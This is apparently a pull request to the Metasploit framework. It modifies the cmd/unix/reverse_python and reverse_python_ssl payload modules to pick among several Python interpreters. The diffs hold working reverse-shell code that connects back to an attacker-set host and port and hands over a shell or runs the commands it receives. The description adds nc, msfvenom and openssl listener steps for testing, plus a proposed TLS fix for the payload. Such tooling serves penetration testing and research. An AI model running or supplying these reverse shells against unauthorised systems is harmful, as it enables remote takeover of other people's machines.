### PR TITLE
multi python support for cmd/unix/reverse_python and cmd/unix/reverse_python_ssl

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -35,7 +35,7 @@ module MetasploitModule
     )
     register_advanced_options(
       [
-        OptString.new('PythonPath', [true, 'The path to the Python executable', 'python'])
+        OptString.new('PythonPath', [true, 'The path to the Python executable', '$(which python || which python3 || which python2)'])
       ]
     )
   end
@@ -59,6 +59,6 @@ module MetasploitModule
   def command_string
     raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\"#{datastore['SHELL']}\")"
     cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}")
-    "#{datastore['PythonPath']} -c \"#{py_create_exec_stub(cmd)}\""
+    "echo #{Shellwords.escape(cmd)} | #{datastore['PythonPath']} -"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -59,7 +59,7 @@ module MetasploitModule
   def command_string
     raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\"#{datastore['SHELL']}\")"
     cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}")
-    if datastore['PythonPath'].nil?
+    if datastore['PythonPath'].blank?
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
     else
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']}  -"

--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -35,7 +35,7 @@ module MetasploitModule
     )
     register_advanced_options(
       [
-        OptString.new('PythonPath', [true, 'The path to the Python executable', ''])
+        OptString.new('PythonPath', [false, 'The path to the Python executable'])
       ]
     )
   end
@@ -59,7 +59,7 @@ module MetasploitModule
   def command_string
     raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\"#{datastore['SHELL']}\")"
     cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}")
-    if datastore['PythonPath'].empty?
+    if datastore['PythonPath'].nil?
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
     else
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']}  -"

--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -35,7 +35,7 @@ module MetasploitModule
     )
     register_advanced_options(
       [
-        OptString.new('PythonPath', [true, 'The path to the Python executable', '$(which python || which python3 || which python2)'])
+        OptString.new('PythonPath', [true, 'The path to the Python executable', ''])
       ]
     )
   end
@@ -59,6 +59,10 @@ module MetasploitModule
   def command_string
     raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\"#{datastore['SHELL']}\")"
     cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}")
-    "echo #{Shellwords.escape(cmd)} | #{datastore['PythonPath']} -"
+    if datastore['PythonPath'].empty?
+      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
+    else
+      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']}  -"
+    end
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -32,7 +32,7 @@ module MetasploitModule
     )
     register_advanced_options(
       [
-        OptString.new('PythonPath', [true, 'The path to the Python executable', 'python'])
+        OptString.new('PythonPath', [true, 'The path to the Python executable', '$(which python || which python3 || which python2)'])
       ]
     )
   end
@@ -64,6 +64,6 @@ module MetasploitModule
     cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
-    "#{datastore['PythonPath']} -c \"#{py_create_exec_stub(cmd)}\""
+    "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']} -"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -32,7 +32,7 @@ module MetasploitModule
     )
     register_advanced_options(
       [
-        OptString.new('PythonPath', [true, 'The path to the Python executable', '$(which python || which python3 || which python2)'])
+        OptString.new('PythonPath', [true, 'The path to the Python executable', ''])
       ]
     )
   end
@@ -64,6 +64,10 @@ module MetasploitModule
     cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
-    "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']} -"
+    if datastore['PythonPath'].empty?
+      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
+    else
+      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']}  -"
+    end
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -64,7 +64,7 @@ module MetasploitModule
     cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
-    if datastore['PythonPath'].nil?
+    if datastore['PythonPath'].blank?
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
     else
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']}  -"

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -32,7 +32,7 @@ module MetasploitModule
     )
     register_advanced_options(
       [
-        OptString.new('PythonPath', [true, 'The path to the Python executable', ''])
+        OptString.new('PythonPath', [false, 'The path to the Python executable'])
       ]
     )
   end
@@ -64,7 +64,7 @@ module MetasploitModule
     cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
-    if datastore['PythonPath'].empty?
+    if datastore['PythonPath'].nil?
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
     else
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']}  -"


### PR DESCRIPTION
Fixes #19811

This PR adds support for multiple python binaries for cmd/unix/reverse_python and cmd/unix/reverse_python_ssl as mentioned in the issue above.

I am re-opening a merge request from another account because my previous account "jeanmtr" was suspended and all traces of its activities were deleted ( i do not know the reason behind the suspension). Sorry for any inconvenience this may cause. 



## Verification

List the steps needed to make sure this thing works
for reverse_python : 

- [x] Run `nc -lvnp 4444`
- [x] Run `msfvenom -p cmd/unix/reverse_python LHOST=[host to test]`
- [x] **Verify** if the reverse shell is working 


for reverse_python_ssl : 

- [x] Generate ssl key and cert
- [x] Run `openssl s_server -accept 4444 -cert server.crt -key server.key -quiet`
- [x] Run `msfvenom -p cmd/unix/reverse_python_ssl LHOST=[host to test]`
- [ ] **Verify** if the reverse shell is working 


However there is an unrelated incompatibility with python version higher than 3.12, the ssl.wrap_socket method was removed. Here is a proposed fix that would fix it, i think the same issue is present in `modules/payloads/singles/python/shell_reverse_tcp_ssl.rb `. I don't know if i should open a separate issue or not so i will just put the diff here.

```diff
@@ -54,16 +54,19 @@ module MetasploitModule
     # Set up the socket
     cmd += "import socket,subprocess,os,ssl\n"
     cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
+    cmd += "context=ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\n"
+    cmd += "context.check_hostname = False\n"
+    cmd += "context.verify_mode = ssl.CERT_NONE\n"
     cmd += "so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
-    cmd += "s=ssl.wrap_socket(so)\n"
+    cmd += "so = context.wrap_socket(so)\n"
     # The actual IO
     cmd += "#{dead}=False\n"
     cmd += "while not #{dead}:\n"
-    cmd += "\tdata=s.recv(1024)\n"
+    cmd += "\tdata=so.recv(1024)\n"
     cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
     cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
-    cmd += "\ts.send(stdout_value)\n"
-    "#{datastore['PythonPath']} -c \"#{py_create_exec_stub(cmd)}\""
+    cmd += "\tso.send(stdout_value)\n"
+    "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']} -"
   end
 end
```
